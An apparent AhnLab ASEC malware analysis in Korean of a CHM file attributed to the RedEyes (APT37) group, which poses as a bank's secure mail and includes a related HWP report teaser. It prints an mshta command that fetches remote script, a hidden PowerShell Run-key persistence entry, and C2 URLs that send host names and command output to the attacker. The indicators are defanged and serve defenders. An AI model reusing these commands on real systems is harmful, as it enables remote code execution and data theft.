국내 금융 기업 보안 메일을 사칭한 CHM 악성코드 : RedEyes(ScarCruft)

ASEC(AhnLab Security Emergency response Center) 분석팀은 RedEyes 공격 그룹(also known as APT37, ScarCruft) 이 제작한 것으로 추정되는 CHM 악성코드가 국내 사용자를 대상으로 유포되고 있는 정황을 포착하였다. 지난 2월에 소개한 RedEyes 그룹의 M2RAT 악성코드 공격 과정 중 “2.3. 지속성 유지 (Persistence)” 과정에서 사용된 명령어가 이번 공격에서도 동일한 형태로 사용된 것을 확인하였다. 해당 정보를 포함한 CHM 악성코드의 상세한 동작 과정은 아래에서 소개한다.

스테가노그래피 기법 사용한 한글(HWP) 악성코드 : RedEyes(ScarCruft) – ASEC BLOG

ASEC(AhnLab Security Emergengy response Center) 분석팀은 지난 1월 RedEyes 공격 그룹(also known as APT37, ScarCruft)이 한글 EPS(Encapulated PostScript) 취약점(CVE-2017-8291)을 통해 악성코드를 유포하는 정황을 확인하였다. 본 보고서에서는 RedEyes 그룹의 최신 국내 활동에 대해 공유한다. 1. 개요 RedEyes 그룹은 기업이 아닌 특정 개인을 대상으로 개인 PC 정보 뿐만 아니라 휴대전화 데이터까지 탈취하는 것으로 알려져있다…

CHM 파일 실행 시, 국내 금융 기업의 보안 메일을 사칭한 도움말 창을 생성한다. 이때 CHM 내부에 존재하는 악성 스크립트가 동작하며 사용자는 해당 과정을 알아차리기 힘들다. 이러한 특징을 이용하여 최근 CHM 을 이용한 악성코드 유포가 증가하고 있다.

실행되는 악성 스크립트는 아래와 같으며, 이전에 소개된 CHM 악성코드들과 동일하게 바로가기 객체(ShortCut)를 이용하였다. 바로가기 객체는 Click 메서드를 통해 호출되며 Item1 항목에 존재하는 명령어가 실행된다. 해당 파일에서는 mshta 프로세스를 통해 특정 url 에 존재하는 추가 스크립트를 실행하게 된다.

• 실행 명령어
  mshta.exe hxxp://shacc[.]kr/skin/product/1.html

mshta 프로세스를 통해 실행되는 “1.html” 파일에는 JS(JavaScript) 코드가 포함되어 있으며, 해당 코드는 인코딩된 파워쉘 명령어를 실행하는 기능을 수행한다. 이때 실행되는 파워쉘 명령어는 앞서 언급한 M2RAT 악성코드 공격 과정에서 사용된 명령어와 유사한 형태이다.

디코딩된 파워쉘 명령어를 확인한 결과 C2 주소, 명령 실행 결과를 저장하는 파일명, 레지스트리 값 이름 외에는 2월에 사용되었던 명령어와 코드가 모두 동일하였다. 해당 명령어는 지속성을 위한 RUN 키 등록, 공격자 서버로부터 명령어 수신, 명령 실행 결과 전달의 기능을 수행한다.

• RUN 키 등록
  레지스트리 경로 : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  값 이름 : icxrNpVd
  값 : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html
• C2
  hxxp://shacc[.]kr/skin/product/mid.php?U=[컴퓨터이름]+[유저이름] // 공격자 명령 수신
  hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64 인코딩] // 명령 실행 결과 전달

해당 유형의 악성코드에 감염될 경우 공격자의 명령에 따라 파일 다운로드 및 정보 탈취 등 다양한 악성 행위를 수행할 수 있게 되며 큰 피해를 입을 수 있다. 특히, 국내 특정 사용자를 대상으로 유포하는 악성코드는 유포 대상에 따라 관심 있는 주제의 내용을 포함하여 사용자의 실행을 유도하기 때문에 출처가 불분명한 메일의 열람을 자제하고 첨부된 파일은 실행하지 않도록 해야 한다. 또한, 주기적으로 PC 검사를 진행하고 보안 제품을 최신 엔진으로 업데이트해야 한다.

[파일 진단]
Trojan/CHM.Agent (2023.03.03.03)

 

MD5

8d2eebd10d90953cfada64575328ae24